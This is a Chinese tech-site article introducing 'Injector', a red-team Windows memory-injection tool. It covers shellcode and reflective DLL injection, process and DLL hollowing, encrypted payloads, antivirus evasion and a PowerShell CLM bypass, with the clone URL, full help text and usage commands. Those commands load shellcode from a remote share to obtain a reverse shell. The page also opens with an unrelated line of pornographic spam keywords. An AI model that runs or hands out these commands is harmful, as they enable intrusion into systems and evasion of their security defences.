自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何使用Injector實現(xiàn)Windows下的內(nèi)存注入

安全 網(wǎng)站安全
Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。

[[423411]]

關(guān)于Injector

Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。

Injector能做什么?

針對遠程服務(wù)器和本地存儲提供Shellcode注入支持。只需指定Shellcode文件,該工具將幫助我們完成后續(xù)的所有事情。默認情況下,工具會將Shellcode注入至exe,如果沒有找到目標進程,它將會創(chuàng)建一個記事本進程,并注入其中實現(xiàn)持久化感染。

  • 支持反射DLL注入,工具將下載DLL并注入遠程進程。
  • 通過exe實現(xiàn)進程鏤空。
  • 使用-bypass參數(shù),以支持使用更高級的、未記錄的API來進行進程注入。
  • 支持加密的Shellcode,比如說AES加密或異或加密等。
  • 支持針對PowerShell的CLM繞過,可以直接將代碼存防止能夠執(zhí)行C#代碼的白名單文件夾中,比如說“C:\Windows\Tasks”。
  • 支持DLL鏤空,通過dll實現(xiàn)。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/0xDivyanshu/Injector.git 

工具幫助

  1. C:\Users\admin>Injector.exe 
  2.  
  3. Help Options for Xenon: 
  4.  
  5. -m       Mode of operation 
  6.  
  7.         -m 1     Specifies the mode as Process injection 
  8.  
  9.         -m 2     Specifies the mode as Reflective DLL Injection 
  10.  
  11.         -m 3     Specifies the mode as Process Hollowing 
  12.  
  13.         -m 4     No injection! Give me my damn shell 
  14.  
  15.         -m 5     Powershell session via CLM bypass 
  16.  
  17.         -m 6     DLL hollowing 
  18.  
  19.   
  20.  
  21. -TempFile        File location that your current user can read 
  22.  
  23. -shellcode       Use shellcode 
  24.  
  25. -dll     Use dll 
  26.  
  27. -decrypt-xor     Specify Xor decryption for shellcode 
  28.  
  29.          -pass   Specifty the password for Xor decryption 
  30.  
  31. -decrypt-aes     Specify aes decryption for shellcode 
  32.  
  33.          -pass   Specifty the password for aes decryption 
  34.  
  35. -location        Specify the location i.e either server or local 
  36.  
  37. -bypass         Uses enhance attempts to bypass AV 

如需生成加密的Shellcode,請在Kali下使用Helper.exe。

工具使用樣例

  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass 

上述命令將解密你的Shellcode并給你一個反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令運行下列命令:

  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt" 

將其中的“-m=1”修改為“2,3,4,6”之后,就可以運行其他模式了:

  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt 

上述命令將提供要給會話,我們可以使用它來執(zhí)行IEX cradle,并獲取一個能夠繞過CLM的反向Shell。

PowerShell

你還可以使用Invoke-Exe.ps1來通過PowerShel執(zhí)行Injector:

  1. Invoke-Exe -loc C:\Users\john\injector.exe 

項目地址

Injector:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2021-09-13 18:09:35

cThreadHija遠程進程注入網(wǎng)絡(luò)攻擊

2021-07-28 09:53:53

FalconEye注入安全檢測

2025-04-01 00:33:03

LangGraphPython內(nèi)存

2010-04-08 15:37:33

2017-08-16 16:00:05

PHPcontainer依賴注入

2014-03-04 09:53:29

Redis存儲系統(tǒng)

2010-06-04 14:12:57

Hadoop開發(fā)環(huán)境

2009-09-09 13:47:38

C++訪問SqlCe

2010-09-27 15:03:34

TomcatJVM內(nèi)存設(shè)置

2020-11-25 08:41:56

Windows

2009-04-11 15:12:24

Windows CE串行通信GPS

2017-04-13 13:00:27

LinuxWindowstomcat

2018-07-24 09:57:02

2010-05-26 15:07:36

SVN版本庫自動備份

2022-09-01 13:12:53

LinuxTC網(wǎng)絡(luò)限流

2011-09-05 14:17:07

UbuntuWindows鍵

2011-08-08 16:49:07

自動關(guān)機SwitchOffWindows

2010-06-07 09:47:34

php sendmai

2012-09-28 13:39:40

Windows備份

2018-12-07 11:15:20

設(shè)置Windows 10命令
點贊
收藏

51CTO技術(shù)棧公眾號